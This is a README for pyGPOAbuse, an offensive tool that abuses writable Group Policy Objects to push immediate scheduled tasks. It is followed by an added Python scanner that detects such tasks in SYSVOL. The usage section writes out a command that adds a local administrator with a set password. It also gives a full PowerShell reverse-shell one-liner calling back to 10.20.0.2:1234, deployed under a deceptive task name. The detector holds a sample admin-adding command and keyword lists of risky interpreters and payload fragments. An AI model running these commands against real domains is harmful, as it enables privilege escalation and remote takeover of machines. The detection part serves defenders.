pyGPOAbuse - Partial Python Implementation Of SharpGPOAbuse

Python partial implementation of SharpGPOAbuse by @pkb1s
This tool can be used when a controlled account can modify an existing GPO that applies to one or more users or computers. It creates an immediate scheduled task that runs as SYSTEM on the remote computer for a computer GPO, or as the logged-in user for a user GPO.
The default behavior adds a local administrator.

How to use

Basic usage

Add john user to local administrators group (Password: H4x00r123..)
./pygpoabuse.py DOMAIN/user -hashes lm:nt -gpo-id "12345677-ABCD-9876-ABCD-123456789012"

Advanced usage

Reverse shell example
Code:
./pygpoabuse.py DOMAIN/user -hashes lm:nt -gpo-id "12345677-ABCD-9876-ABCD-123456789012" \
    -powershell \
    -command "\$client = New-Object System.Net.Sockets.TCPClient('10.20.0.2',1234);\$stream = \$client.GetStream();[byte[]]\$bytes = 0..65535|%{0};while((\$i = \$stream.Read(\$bytes, 0, \$bytes.Length)) -ne 0){;\$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$bytes,0, \$i);\$sendback = (iex \$data 2>&1 | Out-String );\$sendback2 = \$sendback + 'PS ' + (pwd).Path + '> ';\$sendbyte = ([text.encoding]::ASCII).GetBytes(\$sendback2);\$stream.Write(\$sendbyte,0,\$sendbyte.Length);\$stream.Flush()};\$client.Close()" \
    -taskname "Completely Legit Task" \
    -description "Dis is legit, pliz no delete" \
    -user
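From the defender's side, the artifact this technique leaves behind is an "immediate" task entry in a GPO's Group Policy Preferences ScheduledTasks.xml in SYSVOL. The following is an added example, not part of pygpoabuse or SharpGPOAbuse: it parses such a file, pulls out every ImmediateTask/ImmediateTaskV2 element with its run-as principal and command, and lists the reasons a task deserves a closer look. The XML is a constructed sample that mimics the GPP layout (element and attribute names are assumed from the format as commonly written; verify against a real file from your domain), and it reuses the task name and description from the usage example above.

```python
# Added example (not part of pygpoabuse): scan a Group Policy Preferences
# ScheduledTasks.xml for "immediate" tasks and rate each one.
# The XML below is a constructed sample that mimics the GPP layout; the real
# file lives under a GPO's Machine (or User) Preferences directory in SYSVOL
# (path and exact schema assumed, verify against your domain).
import xml.etree.ElementTree as ET

# Constructed sample: one immediate task that runs a command as SYSTEM.
SAMPLE_SCHEDULED_TASKS_XML = r"""<ScheduledTasks clsid="{CC63F200-7309-4ba0-B154-A71CD118DBCC}">
  <ImmediateTaskV2 clsid="{9756B581-76EC-4169-9AFC-0CA8D43ADB5F}"
                   name="Completely Legit Task" image="0"
                   changed="2021-06-01 12:00:00"
                   uid="{00000000-0000-0000-0000-000000000001}">
    <Properties action="C" name="Completely Legit Task"
                runAs="NT AUTHORITY\System" logonType="S4U">
      <Task version="1.3">
        <RegistrationInfo>
          <Author>NT AUTHORITY\System</Author>
          <Description>Dis is legit, pliz no delete</Description>
        </RegistrationInfo>
        <Principals>
          <Principal id="Author">
            <UserId>NT AUTHORITY\System</UserId>
            <RunLevel>HighestAvailable</RunLevel>
          </Principal>
        </Principals>
        <Actions Context="Author">
          <Exec>
            <Command>cmd.exe</Command>
            <Arguments>/c net localgroup administrators john /add</Arguments>
          </Exec>
        </Actions>
      </Task>
    </Properties>
  </ImmediateTaskV2>
</ScheduledTasks>
"""

# Interpreters and LOLBins that are rarely legitimate in an immediate task.
RISKY_BINARIES = ("powershell", "pwsh", "cmd.exe", "mshta", "rundll32",
                  "regsvr32", "wscript", "cscript", "certutil")
# Argument fragments typical of encoded/staged payloads or local-admin changes.
RISKY_ARG_FRAGMENTS = ("-enc", "frombase64string", "iex", "invoke-expression",
                       "downloadstring", "net localgroup administrators")


def parse_immediate_tasks(xml_text):
    """Return one dict per ImmediateTask/ImmediateTaskV2 element."""
    root = ET.fromstring(xml_text)
    findings = []
    for task in root.iter():
        if task.tag not in ("ImmediateTask", "ImmediateTaskV2"):
            continue
        props = task.find("Properties")
        run_as = props.get("runAs", "") if props is not None else ""
        exec_node = task.find(".//Actions/Exec")
        command = arguments = ""
        if exec_node is not None:
            command = (exec_node.findtext("Command") or "").strip()
            arguments = (exec_node.findtext("Arguments") or "").strip()
        findings.append({
            "name": task.get("name", ""),
            "changed": task.get("changed", ""),
            "run_as": run_as,
            "command": command,
            "arguments": arguments,
            "description": (task.findtext(".//Description") or "").strip(),
        })
    return findings


def risk_reasons(finding):
    """List the reasons a finding deserves attention (empty list = nothing flagged)."""
    reasons = []
    if "system" in finding["run_as"].lower():
        reasons.append("runs as SYSTEM")
    if any(b in finding["command"].lower() for b in RISKY_BINARIES):
        reasons.append("command is a shell/interpreter: " + finding["command"])
    args = finding["arguments"].lower()
    hits = [f for f in RISKY_ARG_FRAGMENTS if f in args]
    if hits:
        reasons.append("suspicious arguments: " + ", ".join(hits))
    return reasons


def scan(xml_text):
    """Return (task name, reasons) for every immediate task with at least one reason."""
    results = []
    for finding in parse_immediate_tasks(xml_text):
        reasons = risk_reasons(finding)
        if reasons:
            results.append((finding["name"], reasons))
    return results


if __name__ == "__main__":
    for name, reasons in scan(SAMPLE_SCHEDULED_TASKS_XML):
        print(f"[!] immediate task {name!r}: " + "; ".join(reasons))
```

Run the scan against every ScheduledTasks.xml under SYSVOL on a schedule and diff against the previous run; a new immediate task, a `changed` timestamp that moves, or a task appearing in a GPO whose owner rarely edits it are the signals worth alerting on, and the GPO's write ACL is the thing to tighten.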

Credits

  • @pkb1s for SharpGPOAbuse
  • @airman604 for schtask_now.py
  • @SkelSec for msldap